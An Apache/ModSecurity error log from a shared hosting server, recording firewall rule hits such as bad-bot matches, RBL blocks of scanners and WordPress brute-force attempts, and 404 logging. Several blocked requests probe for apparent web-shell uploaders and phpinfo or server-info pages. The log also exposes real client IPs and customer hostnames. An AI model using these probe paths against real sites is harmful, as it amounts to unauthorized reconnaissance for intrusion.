[Tue May 26 15:49:37.674661 2026] [security2:error] [pid 747840:tid 748085] [client 127.0.0.1:46738] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.rbkgroups.co.in"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVzuYm6MwAuYuZKxvnwDQAAAX0"]
[Tue May 26 15:49:37.674880 2026] [security2:error] [pid 745492:tid 745743] [client 74.7.244.63:40318] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.rbkgroups.co.in"] [uri "/robots.txt"] [unique_id "ahVzuYmEQglTmoWcfxJ8GwAA-34"]
[Tue May 26 15:49:38.344992 2026] [security2:error] [pid 745492:tid 745645] [client 223.123.35.44:36230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzuomEQglTmoWcfxJ8IQAAAJk"]
[Tue May 26 15:49:38.345202 2026] [security2:error] [pid 745492:tid 745645] [client 223.123.35.44:36230] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzuomEQglTmoWcfxJ8IQAAAJk"]
[Tue May 26 15:49:38.450895 2026] [security2:error] [pid 745492:tid 745695] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzuomEQglTmoWcfxJ8IgAAAMs"]
[Tue May 26 15:49:40.136981 2026] [security2:error] [pid 747840:tid 747984] [client 172.226.42.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVzu4m6MwAuYuZKxvnwOQAAARg"]
[Tue May 26 15:49:40.496962 2026] [security2:error] [pid 747840:tid 748016] [client 143.110.243.118:55296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/991176.php"] [unique_id "ahVzvIm6MwAuYuZKxvnwQgAAATg"]
[Tue May 26 15:49:41.189788 2026] [security2:error] [pid 747840:tid 748093] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzvIm6MwAuYuZKxvnwSgAAAYU"]
[Tue May 26 15:49:41.424443 2026] [security2:error] [pid 747840:tid 748043] [client 95.47.155.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzvIm6MwAuYuZKxvnwTAAAAVM"]
[Tue May 26 15:49:43.391151 2026] [security2:error] [pid 747840:tid 748089] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzvom6MwAuYuZKxvnwawAAAYE"]
[Tue May 26 15:49:43.583065 2026] [security2:error] [pid 747840:tid 748055] [client 103.153.130.62:50712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzv4m6MwAuYuZKxvnwdQAAAV8"]
[Tue May 26 15:49:43.583203 2026] [security2:error] [pid 747840:tid 748055] [client 103.153.130.62:50712] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzv4m6MwAuYuZKxvnwdQAAAV8"]
[Tue May 26 15:49:44.694463 2026] [security2:error] [pid 747840:tid 748052] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzwIm6MwAuYuZKxvnwhwAAAVw"]
[Tue May 26 15:49:45.705742 2026] [security2:error] [pid 747840:tid 748080] [client 223.123.35.44:36231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzwYm6MwAuYuZKxvnwlwAAAXg"]
[Tue May 26 15:49:45.705902 2026] [security2:error] [pid 747840:tid 748080] [client 223.123.35.44:36231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzwYm6MwAuYuZKxvnwlwAAAXg"]
[Tue May 26 15:49:46.790063 2026] [security2:error] [pid 745492:tid 745657] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzwomEQglTmoWcfxJ8bwAAAKU"]
[Tue May 26 15:49:47.104392 2026] [security2:error] [pid 745492:tid 745725] [client 74.7.228.45:33812] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ans.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVzw4mEQglTmoWcfxJ8eAAA6Q4"]
[Tue May 26 15:49:47.192402 2026] [security2:error] [pid 747840:tid 748025] [client 45.132.227.25:31947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 25.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVzwom6MwAuYuZKxvnwrAAAAUE"]
[Tue May 26 15:49:48.578332 2026] [security2:error] [pid 745492:tid 745655] [client 143.110.243.118:39510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-content/codeboy1877_up.php"] [unique_id "ahVzxImEQglTmoWcfxJ8hQAAAKM"]
[Tue May 26 15:49:48.739722 2026] [security2:error] [pid 745492:tid 745733] [client 74.7.230.52:51480] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mail.pronumbers.com.au"] [uri "/cgi-sys/404.html"] [unique_id "ahVzxImEQglTmoWcfxJ8iwAA8Tg"]
[Tue May 26 15:49:48.767648 2026] [security2:error] [pid 747840:tid 748073] [client 66.249.64.2:38742] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzw4m6MwAuYuZKxvnwuQAAAXE"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:48.769140 2026] [security2:error] [pid 747840:tid 748036] [client 66.249.64.3:41743] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzwom6MwAuYuZKxvnwrgAAAUw"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:48.770326 2026] [security2:error] [pid 747840:tid 748064] [client 66.249.64.1:55430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzw4m6MwAuYuZKxvnwsgAAAWg"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:48.774199 2026] [security2:error] [pid 747840:tid 748054] [client 66.249.64.3:44871] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzxIm6MwAuYuZKxvnwvgAAAV4"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:49.275073 2026] [security2:error] [pid 745492:tid 745693] [client 66.249.64.3:40585] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzxImEQglTmoWcfxJ8hAAAAMk"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:50.089665 2026] [security2:error] [pid 747840:tid 748091] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzxYm6MwAuYuZKxvnwzgAAAYM"]
[Tue May 26 15:49:50.120128 2026] [security2:error] [pid 747840:tid 748090] [client 66.249.64.1:55430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzxYm6MwAuYuZKxvnw0gAAAXk"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:50.329697 2026] [security2:error] [pid 747840:tid 747980] [client 66.249.64.1:35102] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVzxom6MwAuYuZKxvnw1QAAARQ"], referer: https://www.yourstorybag.com/mother-tongue-my-origin-story/
[Tue May 26 15:49:50.506349 2026] [security2:error] [pid 747840:tid 747947] [remote 95.216.117.13:44116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVzxom6MwAuYuZKxvnw1gABZ2o"]
[Tue May 26 15:49:51.236309 2026] [security2:error] [pid 747840:tid 748086] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzxom6MwAuYuZKxvnw4AAAAX4"]
[Tue May 26 15:49:52.760077 2026] [security2:error] [pid 745492:tid 745698] [client 143.110.243.118:39524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/hehe.php"] [unique_id "ahVzyImEQglTmoWcfxJ8wwAAAM4"]
[Tue May 26 15:49:53.753556 2026] [security2:error] [pid 747840:tid 748047] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzyYm6MwAuYuZKxvnxCwAAAVc"]
[Tue May 26 15:49:53.790992 2026] [security2:error] [pid 747840:tid 748088] [client 103.153.130.62:50998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzyYm6MwAuYuZKxvnxFgAAAYA"]
[Tue May 26 15:49:53.791256 2026] [security2:error] [pid 747840:tid 748088] [client 103.153.130.62:50998] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzyYm6MwAuYuZKxvnxFgAAAYA"]
[Tue May 26 15:49:54.406940 2026] [security2:error] [pid 745492:tid 745712] [client 223.123.35.44:36232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzyomEQglTmoWcfxJ81QAAANw"]
[Tue May 26 15:49:54.407086 2026] [security2:error] [pid 745492:tid 745712] [client 223.123.35.44:36232] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzyomEQglTmoWcfxJ81QAAANw"]
[Tue May 26 15:49:56.582601 2026] [security2:error] [pid 745492:tid 745657] [client 23.158.233.121:51467] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVzy4mEQglTmoWcfxJ89gAAAKU"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:49:57.081564 2026] [security2:error] [pid 747840:tid 747984] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzzIm6MwAuYuZKxvnxKAAAARg"]
[Tue May 26 15:49:58.092430 2026] [security2:error] [pid 745492:tid 745645] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzzYmEQglTmoWcfxJ9HQAAAJk"]
[Tue May 26 15:49:59.543703 2026] [security2:error] [pid 745492:tid 745678] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzz4mEQglTmoWcfxJ9NAAAALo"]
[Tue May 26 15:50:02.291525 2026] [security2:error] [pid 745492:tid 745736] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz0YmEQglTmoWcfxJ9TgAAAPQ"]
[Tue May 26 15:50:02.411664 2026] [autoindex:error] [pid 747840:tid 748065] [client 43.130.139.177:36832] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:50:04.092559 2026] [security2:error] [pid 747840:tid 747994] [client 223.123.35.44:36233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVz04m6MwAuYuZKxvnxiwAAASI"]
[Tue May 26 15:50:04.092698 2026] [security2:error] [pid 747840:tid 747994] [client 223.123.35.44:36233] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVz04m6MwAuYuZKxvnxiwAAASI"]
[Tue May 26 15:50:04.250041 2026] [security2:error] [pid 747840:tid 748023] [client 103.153.130.62:51285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz1Im6MwAuYuZKxvnxmgAAAT8"]
[Tue May 26 15:50:04.250150 2026] [security2:error] [pid 747840:tid 748023] [client 103.153.130.62:51285] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVz1Im6MwAuYuZKxvnxmgAAAT8"]
[Tue May 26 15:50:04.437600 2026] [security2:error] [pid 747840:tid 748087] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz1Im6MwAuYuZKxvnxlgAAAX8"]
[Tue May 26 15:50:06.513513 2026] [security2:error] [pid 747840:tid 748015] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz1om6MwAuYuZKxvnxrwAAATc"]
[Tue May 26 15:50:07.207137 2026] [security2:error] [pid 747840:tid 748091] [client 185.191.171.9:43236] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVz14m6MwAuYuZKxvnxvgAAAYM"]
[Tue May 26 15:50:07.207279 2026] [security2:error] [pid 747840:tid 748091] [client 185.191.171.9:43236] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVz14m6MwAuYuZKxvnxvgAAAYM"]
[Tue May 26 15:50:07.630716 2026] [security2:error] [pid 745492:tid 745723] [client 143.110.243.118:34400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/post-data.php"] [unique_id "ahVz14mEQglTmoWcfxJ9mwAAAOc"]
[Tue May 26 15:50:07.844393 2026] [security2:error] [pid 747840:tid 747995] [client 127.0.0.1:20126] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.rehobothindependentcare.com"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVz14m6MwAuYuZKxvnxyAAAASM"]
[Tue May 26 15:50:07.844392 2026] [security2:error] [pid 747840:tid 748051] [client 127.0.0.1:20132] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVz14m6MwAuYuZKxvnxyQAAAVs"]
[Tue May 26 15:50:07.844516 2026] [security2:error] [pid 747840:tid 748026] [client 74.7.175.129:45476] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahVz14m6MwAuYuZKxvnxxwABQgw"]
[Tue May 26 15:50:08.425548 2026] [security2:error] [pid 747840:tid 748072] [client 45.88.151.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVz2Im6MwAuYuZKxvnxzgAAAXA"], referer: https://www.anujtradingco.com/
[Tue May 26 15:50:08.464043 2026] [security2:error] [pid 745492:tid 745738] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz2ImEQglTmoWcfxJ9nQAAAPY"]
[Tue May 26 15:50:09.008520 2026] [core:crit] [pid 747840:tid 748029] (13)Permission denied: [client 40.77.167.159:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:50:09.443338 2026] [security2:error] [pid 747840:tid 748049] [client 45.82.64.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz2Ym6MwAuYuZKxvnx3QAAAVk"]
[Tue May 26 15:50:09.684091 2026] [security2:error] [pid 745492:tid 745700] [client 45.88.151.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVz2YmEQglTmoWcfxJ9rgAAANA"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1223347&moderation-hash=fb435f0fc91221d6250aea3612a824dd
[Tue May 26 15:50:10.694804 2026] [security2:error] [pid 745492:tid 745702] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz2omEQglTmoWcfxJ9twAAANI"]
[Tue May 26 15:50:11.960132 2026] [security2:error] [pid 747840:tid 748043] [client 45.148.10.159:47500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/admin/server_info.php"] [unique_id "ahVz24m6MwAuYuZKxvnyBAAAAVM"]
[Tue May 26 15:50:12.643670 2026] [security2:error] [pid 745492:tid 745668] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVz3ImEQglTmoWcfxJ91wAAALA"]
[Tue May 26 15:50:12.685784 2026] [security2:error] [pid 745492:tid 745673] [client 45.148.10.159:47506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/server_info.php"] [unique_id "ahVz3ImEQglTmoWcfxJ94gAAALU"]
[Tue May 26 15:50:12.861771 2026] [security2:error] [pid 745492:tid 745730] [client 45.88.151.189:40259] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVz3ImEQglTmoWcfxJ93QAAAO4"], referer: https://anujtradingco.com
[Tue May 26 15:50:13.078797 2026] [security2:error] [pid 745492:tid 745629] [client 45.148.10.159:47508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVz3YmEQglTmoWcfxJ96QAAAIk"]
